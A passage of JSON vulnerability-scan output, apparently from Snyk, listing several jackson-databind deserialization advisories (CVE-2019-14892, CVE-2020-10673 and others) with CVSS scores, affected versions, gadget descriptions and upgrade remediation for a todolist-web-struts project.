user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + 
"version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": 
"## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the 
general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": 
"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": 
{ + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to 
Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + 